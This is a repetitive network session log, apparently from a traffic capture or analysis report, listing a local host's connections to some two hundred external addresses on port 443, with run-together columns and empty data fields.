                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12790192.168.2.133724089.20.217.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12791192.168.2.1351992117.103.97.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12792192.168.2.1334686140.84.241.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12793192.168.2.1338256205.76.38.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12794192.168.2.1345140167.161.243.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12795192.168.2.133424698.250.33.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12796192.168.2.1360036171.219.58.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12797192.168.2.1356090195.159.213.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12798192.168.2.133337082.226.153.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12799192.168.2.1341280119.48.84.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12800192.168.2.1341952183.116.34.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12801192.168.2.1353746204.180.223.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12802192.168.2.1360184185.205.213.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12803192.168.2.135855451.59.216.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12804192.168.2.1354116199.197.125.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12805192.168.2.1344112140.92.45.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12806192.168.2.133879067.24.228.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12807192.168.2.1340870189.131.76.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12808192.168.2.13459641.5.190.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12809192.168.2.133790291.221.241.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12810192.168.2.134454461.182.213.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12811192.168.2.1343460102.62.158.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12812192.168.2.1345988105.120.84.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12813192.168.2.1338064148.130.101.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12814192.168.2.134071038.152.188.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12815192.168.2.13513005.91.62.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12816192.168.2.13532588.69.130.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12817192.168.2.133413450.133.29.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12818192.168.2.133317072.1.5.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12819192.168.2.1353136159.33.130.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12820192.168.2.1336436175.207.108.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12821192.168.2.1338022168.71.220.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12822192.168.2.135751238.88.68.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12823192.168.2.1336006145.87.164.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12824192.168.2.134741293.15.66.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12825192.168.2.1347638180.118.63.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12826192.168.2.135413054.105.157.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12827192.168.2.133634052.136.146.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12828192.168.2.133833895.148.58.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12829192.168.2.1352300108.220.12.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12830192.168.2.1336522204.194.249.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12831192.168.2.134992024.176.48.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12832192.168.2.1359482177.159.197.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12833192.168.2.1340930114.231.235.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12834192.168.2.1340832169.148.85.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12835192.168.2.133989272.169.205.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12836192.168.2.1334724139.170.109.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12837192.168.2.1350128114.51.67.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12838192.168.2.1334716185.102.30.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12839192.168.2.134645213.105.0.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12840192.168.2.1348478117.47.248.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12841192.168.2.133772838.42.174.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12842192.168.2.1343362110.212.134.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12843192.168.2.136024217.244.19.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12844192.168.2.1352308104.77.58.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12845192.168.2.1360422120.109.103.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12846192.168.2.1343026220.176.123.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12847192.168.2.1357748213.17.133.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12848192.168.2.1354224221.72.128.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12849192.168.2.1347316165.71.202.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12850192.168.2.1353658203.22.206.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12851192.168.2.1342264118.63.241.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12852192.168.2.135650247.2.44.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12853192.168.2.1358154141.239.54.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12854192.168.2.135261851.250.95.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12855192.168.2.135703488.148.236.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12856192.168.2.1351914140.189.202.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12857192.168.2.1341816161.186.80.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12858192.168.2.1349258113.235.142.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12859192.168.2.1353588146.176.57.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12860192.168.2.135593663.110.75.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12861192.168.2.1354124172.61.250.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12862192.168.2.1335532115.103.157.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12863192.168.2.1356774135.13.1.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12864192.168.2.1349944213.155.17.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12865192.168.2.1338320187.234.14.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12866192.168.2.135206298.77.29.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12867192.168.2.134276046.81.32.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12868192.168.2.1349990178.98.154.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12869192.168.2.1352660192.12.29.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12870192.168.2.1347768186.200.159.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12871192.168.2.1349220206.0.167.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12872192.168.2.1338142119.189.116.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12873192.168.2.135029043.11.10.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12874192.168.2.133375075.239.98.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12875192.168.2.1348808129.98.248.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12876192.168.2.1340916202.50.196.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12877192.168.2.1338260116.21.121.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12878192.168.2.1354580222.106.122.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12879192.168.2.1334254210.175.171.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12880192.168.2.135769625.146.214.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12881192.168.2.135116691.77.135.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12882192.168.2.1344964195.48.233.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12883192.168.2.1333094161.66.71.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12884192.168.2.133380071.1.157.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12885192.168.2.1342096183.125.233.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12886192.168.2.1353434212.173.43.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12887192.168.2.135357698.89.62.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12888192.168.2.1342074112.57.122.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12889192.168.2.1352168157.156.45.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12890192.168.2.1334162207.144.136.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12891192.168.2.1335944119.178.112.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12892192.168.2.1351964115.70.142.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12893192.168.2.135546281.171.98.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12894192.168.2.134028241.14.133.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12895192.168.2.133843494.137.133.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12896192.168.2.135639237.29.228.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12897192.168.2.134339642.115.99.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12898192.168.2.1355550164.65.50.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12899192.168.2.1336138114.57.186.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12900192.168.2.1351810200.18.137.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12901192.168.2.1354228103.232.224.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12902192.168.2.1343940206.81.54.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12903192.168.2.135984425.178.70.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12904192.168.2.1334906142.133.132.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12905192.168.2.135105062.155.211.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12906192.168.2.135424666.122.242.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12907192.168.2.1339590145.18.186.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12908192.168.2.13590589.47.152.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12909192.168.2.134059283.147.144.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12910192.168.2.1337776199.180.100.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12911192.168.2.1354106201.173.40.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12912192.168.2.1338564200.164.114.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12913192.168.2.1358572145.185.149.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12914192.168.2.133451649.50.202.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12915192.168.2.1346150220.204.120.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12916192.168.2.135924832.181.167.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12917192.168.2.1333014211.224.229.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12918192.168.2.1356832187.182.215.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12919192.168.2.13374848.75.157.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12920192.168.2.1342118164.216.202.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12921192.168.2.1346332185.236.155.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12922192.168.2.1356828131.164.90.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12923192.168.2.134349048.52.177.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12924192.168.2.133361690.186.45.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12925192.168.2.135056450.241.188.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12926192.168.2.1336842183.24.86.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12927192.168.2.1348674196.247.253.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12928192.168.2.133297025.158.64.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12929192.168.2.1335206176.177.17.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12930192.168.2.134890659.104.243.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12931192.168.2.133304481.43.49.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12932192.168.2.1335736104.80.100.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12933192.168.2.134981876.185.176.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12934192.168.2.135515862.82.160.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12935192.168.2.1348978151.63.138.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12936192.168.2.133882053.109.65.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12937192.168.2.1353266142.163.65.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12938192.168.2.135411691.169.151.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12939192.168.2.133602274.197.198.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12940192.168.2.1346326190.112.35.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12941192.168.2.1359758140.109.174.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12942192.168.2.133556232.163.21.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12943192.168.2.133865274.161.51.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12944192.168.2.1354110125.13.10.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12945192.168.2.1332844191.105.144.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12946192.168.2.135609292.13.48.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12947192.168.2.1346232145.255.58.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12948192.168.2.1339820131.192.157.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12949192.168.2.134738680.218.247.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12950192.168.2.1349718203.61.124.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12951192.168.2.134681241.86.157.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12952192.168.2.135228496.230.43.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12953192.168.2.1358922174.169.118.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12954192.168.2.134778090.99.231.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12955192.168.2.1356776148.2.176.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12956192.168.2.13594642.57.37.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12957192.168.2.133898635.137.107.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12958192.168.2.1348126219.228.26.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12959192.168.2.134059260.192.182.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12960192.168.2.134033069.130.141.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12961192.168.2.1348534135.33.174.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12962192.168.2.1346958146.168.89.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12963192.168.2.134166637.40.224.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12964192.168.2.1359390159.6.61.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12965192.168.2.135774859.119.101.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12966192.168.2.133667624.124.60.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12967192.168.2.1353124161.46.183.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12968192.168.2.134385614.144.158.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12969192.168.2.135259070.98.255.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12970192.168.2.1354824209.79.208.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12971192.168.2.1343892188.227.188.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12972192.168.2.1343572165.116.26.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12973192.168.2.1343310217.174.144.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12974192.168.2.1349900218.234.214.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12975192.168.2.13446429.187.232.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12976192.168.2.1342728130.238.224.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12977192.168.2.1345544140.126.217.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12978192.168.2.1347970130.146.172.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12979192.168.2.1358400161.227.158.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12980192.168.2.134084672.100.59.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12981192.168.2.1352874101.87.86.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12982192.168.2.1353386128.250.11.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12983192.168.2.134568445.0.216.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12984192.168.2.1341022103.206.16.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12985192.168.2.1338774187.141.194.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12986192.168.2.1356274213.159.173.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12987192.168.2.134445259.230.118.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12988192.168.2.133586072.166.209.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12989192.168.2.1354358134.101.230.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12990192.168.2.1339314176.186.7.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12991192.168.2.134353632.241.136.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12992192.168.2.1350738165.227.134.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12993192.168.2.13575308.152.36.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12994192.168.2.1356404128.154.143.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12995192.168.2.134548041.143.177.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12996192.168.2.135119662.8.185.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12997192.168.2.133508077.184.246.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12998192.168.2.1344254126.251.12.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12999192.168.2.134208265.6.56.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13000192.168.2.135186432.29.245.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13001192.168.2.1357438121.169.236.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13002192.168.2.133433471.151.209.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13003192.168.2.134698071.211.23.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13004192.168.2.133958453.32.245.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13005192.168.2.1336972205.135.183.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13006192.168.2.134927470.237.179.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13007192.168.2.133432468.15.124.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13008192.168.2.133514845.12.94.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13009192.168.2.1353636181.56.40.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13010192.168.2.1336956182.238.79.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13011192.168.2.135629469.13.192.26443
